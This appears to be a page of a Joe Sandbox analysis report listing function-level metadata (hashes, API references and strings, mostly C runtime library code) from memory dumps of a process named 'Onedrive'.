Instruction ID: 60f6aaf267ee4911224366f9b678f0ce0ae24898bc4b5e22662e66c9d49e693a
Opcode Fuzzy Hash: 469e38d6eed64a1a91316f730531ced8dac0510bf6a3972017723c6cfb3396b6
Instruction Fuzzy Hash: 12C10E2261EEC3A5EB609F65E4503BBA761EBC57C0F501032EA8E47B9ACF6DD444CB50

Function 00007FF8A030CF50 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMONLIBRARYCODE

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030D357
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030D379

Strings

%ls, xrefs: 00007FF8A030D141
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v, xrefs: 00007FF8A030D1C2
("Invalid integer length modifier", 0), xrefs: 00007FF8A030D135, 00007FF8A030D1C9
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030D156, 00007FF8A030D1BB

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-1003573884
Opcode ID: 308437765815ff5fef9f9c808688f9f617a22f9d268eaa4663d86ca56d1bbce6
Instruction ID: 016ef07d99a1c0aad7176926f46f7b37e018a4953c19c581a6b906d9886a8246
Opcode Fuzzy Hash: 308437765815ff5fef9f9c808688f9f617a22f9d268eaa4663d86ca56d1bbce6
Instruction Fuzzy Hash: 40C13F2661EEC295EA609B65E4503BFB7A1FBC57C0F101031EA8E47B9ACF2DD445CB40

Function 00007FF8A030D850 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 238COMMONLIBRARYCODE

Download Yara Rule

APIs

__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030DC57
__ExceptionPtrDestroy.LIBCMTD ref: 00007FF8A030DC79

Strings

%ls, xrefs: 00007FF8A030DA41
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard, xrefs: 00007FF8A030DAC2
("Invalid integer length modifier", 0), xrefs: 00007FF8A030DA35, 00007FF8A030DAC9
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030DA56, 00007FF8A030DABB

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: DestroyException
String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 2436776299-2041781485
Opcode ID: 912e2437d91deac4f330579838eef85cc56769922d80ecc1edd5ef1b8bc710e0
Instruction ID: 31126f200054420acf23e35371234c468c715d4bde319c60460e6c6703015626
Opcode Fuzzy Hash: 912e2437d91deac4f330579838eef85cc56769922d80ecc1edd5ef1b8bc710e0
Instruction Fuzzy Hash: 22C10D2661EEC2A5EB60DB65E4503BAB7A1EBC57C0F501031EA8E47B9ACF6DD444CB40

Function 00007FF8A0309C50 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 233COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0309EA9

Strings

%ls, xrefs: 00007FF8A0309CB6, 00007FF8A0309D95
buffer_count == 0 || buffer != nullptr, xrefs: 00007FF8A0309D89, 00007FF8A0309E1B
minkernel\crts\ucrt\src\appcrt\stdio\output.cpp, xrefs: 00007FF8A0309CCB, 00007FF8A0309D2E, 00007FF8A0309DAA, 00007FF8A0309E0D
common_vsprintf, xrefs: 00007FF8A0309D35, 00007FF8A0309E14
format != nullptr, xrefs: 00007FF8A0309CAA, 00007FF8A0309D3C

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::_
String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
API String ID: 2780765137-3439959449
Opcode ID: 8fc302a938c663c038e340c4baeda506e803461af4fb7fee05b98ac1756c9dc9
Instruction ID: 65e78ec48539afa97e82880c5cdff6be6708148662766cf87aed089cae57e255
Opcode Fuzzy Hash: 8fc302a938c663c038e340c4baeda506e803461af4fb7fee05b98ac1756c9dc9
Instruction Fuzzy Hash: 3BC12C2291EF8696EA70CB54F4503ABA3A0FB84785F601136E68D87B99DF7DD944CF00

Function 00007FF8A030A110 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 229COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A030A369

Strings

%ls, xrefs: 00007FF8A030A176, 00007FF8A030A255
buffer_count == 0 || buffer != nullptr, xrefs: 00007FF8A030A249, 00007FF8A030A2DB
minkernel\crts\ucrt\src\appcrt\stdio\output.cpp, xrefs: 00007FF8A030A18B, 00007FF8A030A1EE, 00007FF8A030A26A, 00007FF8A030A2CD
common_vsprintf, xrefs: 00007FF8A030A1F5, 00007FF8A030A2D4
format != nullptr, xrefs: 00007FF8A030A16A, 00007FF8A030A1FC

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::_
String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
API String ID: 2780765137-3439959449
Opcode ID: c1ee4b9d8667413ed4f81e61ef1550aac306862adbeed06d7b0a525d6e872b36
Instruction ID: 58123bd0d81a96aa4b34c3ec8d0b5700e922449c73d65d9c767f6a139493e4c0
Opcode Fuzzy Hash: c1ee4b9d8667413ed4f81e61ef1550aac306862adbeed06d7b0a525d6e872b36
Instruction Fuzzy Hash: 6FC10832A1EE8296EA70CB54F8443ABA3A0FB85395F601135E68D87B98DF7DD545CF00

Function 00007FF8A03152C0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 147COMMON

Download Yara Rule

Strings

__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v, xrefs: 00007FF8A03153C2, 00007FF8A031551A
%ls, xrefs: 00007FF8A0315347, 00007FF8A031549F
("Invalid integer length modifier", 0), xrefs: 00007FF8A0315493, 00007FF8A0315521
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A031535C, 00007FF8A03153BB, 00007FF8A03154B4, 00007FF8A0315513
("'n' format specifier disabled", 0), xrefs: 00007FF8A031533B, 00007FF8A03153C9

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: get_int64_arg
String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 1967237116-2589718845
Opcode ID: 1571fae24718bc4f499a30154422bbf6e6c706c7d3a6b255a949ed42d7060a54
Instruction ID: ad95378bf862459495f5e4ff3d44f35d661711ecd9a3c3018f9861f7f443b1a6
Opcode Fuzzy Hash: 1571fae24718bc4f499a30154422bbf6e6c706c7d3a6b255a949ed42d7060a54
Instruction Fuzzy Hash: B6713A36A1AF43E2EB508B15E48026A77A1FB897C6F501031EA8E4B7A4DE7DD4458B00

Function 00007FF8A0315550 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 147COMMON

Download Yara Rule

Strings

%ls, xrefs: 00007FF8A03155D7, 00007FF8A031572F
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo, xrefs: 00007FF8A0315652, 00007FF8A03157AA
("Invalid integer length modifier", 0), xrefs: 00007FF8A0315723, 00007FF8A03157B1
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A03155EC, 00007FF8A031564B, 00007FF8A0315744, 00007FF8A03157A3
("'n' format specifier disabled", 0), xrefs: 00007FF8A03155CB, 00007FF8A0315659

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: get_int64_arg
String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 1967237116-485287010
Opcode ID: d356d4bb658979b681b4911ef5bf00e3ae0c0756d7d0f442ad72f8d187c081c4
Instruction ID: d890d698889b5c73aa98833bdeab8cbd231619b878c42e17cb602c1464af8658
Opcode Fuzzy Hash: d356d4bb658979b681b4911ef5bf00e3ae0c0756d7d0f442ad72f8d187c081c4
Instruction Fuzzy Hash: F5711A36A1EF43E6EB608B15E48127A77A0FB897C5F501035EA8E4BBA4DF3DD5458B00

Function 00007FF8A0315030 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 147COMMON

Download Yara Rule

Strings

%ls, xrefs: 00007FF8A03150B7, 00007FF8A031520F
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard, xrefs: 00007FF8A0315132, 00007FF8A031528A
("Invalid integer length modifier", 0), xrefs: 00007FF8A0315203, 00007FF8A0315291
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A03150CC, 00007FF8A031512B, 00007FF8A0315224, 00007FF8A0315283
("'n' format specifier disabled", 0), xrefs: 00007FF8A03150AB, 00007FF8A0315139

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: get_int64_arg
String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
API String ID: 1967237116-3627661228
Opcode ID: 6454f08fe2c758332c2d827023cd1bfa62773c42d17287b729fb28d338e575c5
Instruction ID: 028986a065c16d957d7008dc372d7becdbd89a1af6653fd03232c36d484b608f
Opcode Fuzzy Hash: 6454f08fe2c758332c2d827023cd1bfa62773c42d17287b729fb28d338e575c5
Instruction Fuzzy Hash: 9C710B36A1AF43E6EB508B15E45037A77A0FB897C6F201435EA8E4BBA5DF3DD4458B00

Function 00007FF8A033B8B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 138COMMON

Download Yara Rule

Strings

(fh >= 0 && (unsigned)fh < (unsigned)_nhandle), xrefs: 00007FF8A033B951, 00007FF8A033B9FB
%ls, xrefs: 00007FF8A033B95D, 00007FF8A033BA72
(_osfile(fh) & FOPEN), xrefs: 00007FF8A033BA66, 00007FF8A033BB10
minkernel\crts\ucrt\src\appcrt\lowio\close.cpp, xrefs: 00007FF8A033B972, 00007FF8A033B9ED, 00007FF8A033BA87, 00007FF8A033BB02
_close_internal, xrefs: 00007FF8A033B9F4, 00007FF8A033BB09

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close_internal$minkernel\crts\ucrt\src\appcrt\lowio\close.cpp
API String ID: 0-4089689869
Opcode ID: 1ac1be5a7282ee981aa8c6e2645118313e67f99d674ba1043b3155909c36ed17
Instruction ID: 955344bfb205b676fe6c7c422100d4644b1f6f46ea040d62bb9c8ff7faa2c658
Opcode Fuzzy Hash: 1ac1be5a7282ee981aa8c6e2645118313e67f99d674ba1043b3155909c36ed17
Instruction Fuzzy Hash: 0F716F31A0EE83A9EB60DB10E4803AAB3A1FB853D5F505135E69D47BA9DF3DE445CB01

Function 00007FF6104F53E4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131fileCOMMON

Download Yara Rule

APIs

SetupOpenInfFileW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF6104F61BD), ref: 00007FF6104F5414
SetupGetLineCountW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF6104F61BD), ref: 00007FF6104F5440

Part of subcall function 00007FF6104F62F0: GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6414
Part of subcall function 00007FF6104F62F0: HeapFree.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6428

SetupGetLineByIndexW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF6104F61BD), ref: 00007FF6104F548F
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF6104F61BD), ref: 00007FF6104F5555

Part of subcall function 00007FF6104F5020: SetupGetStringFieldW.SETUPAPI ref: 00007FF6104F5060
Part of subcall function 00007FF6104F5020: GetLastError.KERNEL32 ref: 00007FF6104F5070
Part of subcall function 00007FF6104F5020: GetProcessHeap.KERNEL32 ref: 00007FF6104F5114
Part of subcall function 00007FF6104F5020: HeapFree.KERNEL32 ref: 00007FF6104F5129

SetupCloseInfFile.SETUPAPI ref: 00007FF6104F5595

Strings

IsoCodes, xrefs: 00007FF6104F542F, 00007FF6104F5476

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Setup$Heap$ErrorFileFreeLastLineProcess$CloseCountFieldIndexOpenString
String ID: IsoCodes
API String ID: 2280877036-2510055618
Opcode ID: be652fbc45620a5908cb8072d4c18c3619e8032dbb75b623b03805d778d16cbb
Instruction ID: eebe9e2492e0ab94e79ed41e33ad44020fa54ed95c4d349f641d84be082ba4b5
Opcode Fuzzy Hash: be652fbc45620a5908cb8072d4c18c3619e8032dbb75b623b03805d778d16cbb
Instruction Fuzzy Hash: AA51A232B08E02F6FF009B3998502BD3AAAAB45BB4F956135DE1DD7788DF38D4518780

Function 00007FF6104F6B88 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70 ref: 00007FF6104F6BB9
SysAllocString.OLEAUT32 ref: 00007FF6104F6BE6
SysFreeString.OLEAUT32 ref: 00007FF6104F6C18
?Release@Value@DirectUI@@QEAAXXZ.DUI70 ref: 00007FF6104F6CD6
SysFreeString.OLEAUT32 ref: 00007FF6104F6D01

Strings

ErrorCID, xrefs: 00007FF6104F6C9B, 00007FF6104F6CB8

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: String$DirectFree$AllocContentElement@Release@String@Value@Value@2@@
String ID: ErrorCID
API String ID: 4116192075-3250631935
Opcode ID: 1a5d23ca152dadde304749bc145f2caeedeb1fc9cf03495dad69489016ff52c3
Instruction ID: 5b21f06f94766d67b318c9fcd23b3a84af0df96c14c0cffb4def8df482fd4da2
Opcode Fuzzy Hash: 1a5d23ca152dadde304749bc145f2caeedeb1fc9cf03495dad69489016ff52c3
Instruction Fuzzy Hash: A251AD21F0CE93E2EE156B29959017C6699EF8CFB4F144430DD8EDB3A5DE2CE8254340

Function 00007FF6104F60D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F62F0: GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6414
Part of subcall function 00007FF6104F62F0: HeapFree.KERNEL32(?,?,0000200000000000,00007FF6104F65C4,?,?,?,?,?,?,?,?,?,00007FF6104F7F0D), ref: 00007FF6104F6428

GetSystemDirectoryW.KERNEL32 ref: 00007FF6104F611C
GetLastError.KERNEL32 ref: 00007FF6104F612C
GetProcessHeap.KERNEL32 ref: 00007FF6104F6240
HeapFree.KERNEL32 ref: 00007FF6104F6255

Strings

\SPPUI, xrefs: 00007FF6104F6155
\Phone.inf, xrefs: 00007FF6104F618F

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess$DirectoryErrorLastSystem
String ID: \Phone.inf$\SPPUI
API String ID: 2626721824-3874405122
Opcode ID: 6d05aa4b119cfc8b7ba9d63c53efe4eb13d6923910aefcd4dd07ad0bc0ba184a
Instruction ID: ed0f67b855ec02278c6b33acad5af0b3131aa52c101965e74203623f66bbca77
Opcode Fuzzy Hash: 6d05aa4b119cfc8b7ba9d63c53efe4eb13d6923910aefcd4dd07ad0bc0ba184a
Instruction Fuzzy Hash: 8F517331B18E42E2EF24AB3994905BE66A9FF88FA0F554035DA4EC3795DF3CE5148740

Function 00007FF8A032A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00007FF8A032A6D7
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A032A6E5

Strings

minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp, xrefs: 00007FF8A032A7C4

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_EnvironmentSchedulerScheduler::_Strings
String ID: minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
API String ID: 3101938-170101930
Opcode ID: 1a6f84b2561e5535daf748ba60a4e3f0bf090e61d0fe745ac4c143497b32d4e6
Instruction ID: dda766de437cb5265f3a73879029173342d32ba702c5369dd95ad2af61ba47dd
Opcode Fuzzy Hash: 1a6f84b2561e5535daf748ba60a4e3f0bf090e61d0fe745ac4c143497b32d4e6
Instruction Fuzzy Hash: 1651193260EE82A6E750EB15E4513ABB7A4FB95380F600035E6CD47BAADF7DD548CB40

Function 00007FF8A032DE50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 102COMMON

Download Yara Rule

Strings

(fh >= 0 && (unsigned)fh < (unsigned)_nhandle), xrefs: 00007FF8A032DEAC, 00007FF8A032DF15
%ls, xrefs: 00007FF8A032DEB8, 00007FF8A032DF86
_commit, xrefs: 00007FF8A032DF0E, 00007FF8A032DFDC
(_osfile(fh) & FOPEN), xrefs: 00007FF8A032DF7A, 00007FF8A032DFE3
minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp, xrefs: 00007FF8A032DECD, 00007FF8A032DF07, 00007FF8A032DF9B, 00007FF8A032DFD5

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_commit$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
API String ID: 0-1026578051
Opcode ID: 2d2887217acbfcfde2987cc382d93a8f4af831361eccd80c7ef075718c55646e
Instruction ID: 40d9e067bc7e22d72dc12d213915237734ccbcc837f8da750733818cd4842eff
Opcode Fuzzy Hash: 2d2887217acbfcfde2987cc382d93a8f4af831361eccd80c7ef075718c55646e
Instruction Fuzzy Hash: 13517F7191EE43AAE7108F24E44036A73A0FB98399F501235E29E4B7E9CF7DE501CB40

Function 00007FF8A0308640 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A030869D
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A03086A5
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0308700
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0308708

Strings

minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp, xrefs: 00007FF8A030867B, 00007FF8A03086DE
S, xrefs: 00007FF8A03086D6

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr
String ID: S$minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
API String ID: 4142048518-4206356308
Opcode ID: 6b863b76f611ed7eccb153eacd5d39ea5bac51b1c5f065df2645d33949e99aaf
Instruction ID: 5f7c5f18c1a0c0d942abd085f761dc473bcf3bd3ba2989ba265c17419283faab
Opcode Fuzzy Hash: 6b863b76f611ed7eccb153eacd5d39ea5bac51b1c5f065df2645d33949e99aaf
Instruction Fuzzy Hash: BC517161A1FE83A5EA508F44E88437967A4FB847D0F602236E5DE07BE5DF7CE5458B00

Function 00007FF6104F6EAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6104F6ED5
ShellExecuteExW.SHELL32 ref: 00007FF6104F6F68
